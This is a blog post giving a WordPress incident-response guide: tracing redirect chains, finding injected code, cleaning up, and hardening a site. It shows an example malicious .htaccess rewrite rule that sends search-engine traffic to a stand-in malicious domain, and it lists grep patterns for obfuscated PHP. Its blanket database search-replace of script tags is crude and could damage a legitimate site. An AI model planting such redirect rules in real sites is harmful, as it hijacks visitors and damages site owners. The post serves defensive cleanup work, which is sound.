Hawkinsdev

Posted on Mar 24

Dealing with WordPress Malicious Redirects: A Forensic and Recovery Guide

#webdev #wordpress

Finding your WordPress site redirecting users to suspicious gambling sites or "congratulations" pop-ups is a nightmare for any admin. Beyond the immediate SEO penalty and Chrome "Red Screen" warnings, these infections often involve sophisticated obfuscation that standard security plugins might miss.

As someone who has spent years in the trenches of WAF (Web Application Firewall) management and incident response, this pattern has evolved from simple header injections to complex, multi-stage PHP backdoors. Here is how to diagnose and fix a WordPress hacked redirect in a structured way.

1. Trace the Redirect Chain

Before touching any code, identify how the redirect is triggered. Attackers often use conditional logic to hide from admins:

User-Agent Filtering: The redirect only happens for mobile users or specific browsers
Referrer Checking: It only triggers when a user clicks through from Google or Bing
Cookie Tracking: It only happens once per IP

Use curl to inspect headers without executing malicious scripts:

curl -I -L -A "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X)" https://yourwebsite.com

Look for Location: headers or window.location.href in the HTML body.

2. The Usual Suspects: Where the Malware Lurks

.htaccess Hijack

The most common entry point for redirects is the .htaccess file. Attackers append rules that intercept requests before WordPress loads.

Example:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ http://malicious-domain.com/bad-script.php [R=301,L]

Database Injection (wp_options)

Search your wp_options table for:

siteurl
home
autoloaded entries

Look for:

<script> tags
eval(base64_decode(...))

Attackers often hook into wp_head or wp_footer.

Theme and Plugin Core Files

Check functions.php in your active theme. Look for unexpected hooks such as add_action('wp_head', ...).

Search for suspicious patterns across wp-content:

grep -rnw './wp-content/' -e 'eval('
grep -rnw './wp-content/' -e 'base64_decode'
grep -rnw './wp-content/' -e 'str_rot13'

3. Systematic Cleanup Process

Isolate and Backup

Put the site in maintenance mode
Take a full backup (files and database)

Core Reinstallation

Delete everything except:
- wp-content
- wp-config.php
Reinstall a clean WordPress core

Verify wp-config.php

Check for code before <?php
Check for injected code at the end
Refresh security salts

Audit Plugins and Themes

Remove all inactive plugins and themes
For active ones:
- Delete directories
- Reinstall clean versions

Clean the Database

Inspect wp_posts and wp_options
Remove injected <script> tags

Example:

wp search-replace '<script' ''

4. Hardening for the Future

Fixing the redirect is only half the problem; the entry point must be closed.

File Permissions

Directories: 755
Files: 644
wp-config.php: 400 or 440

Disable File Editing

Add to wp-config.php:

define('DISALLOW_FILE_EDIT', true);

Implement a Reverse Proxy WAF

Local security plugins run inside the compromised environment. A reverse proxy WAF operates outside it and filters:

SQL injection attempts
Remote code execution payloads
Automated scanners

Monitor Access Logs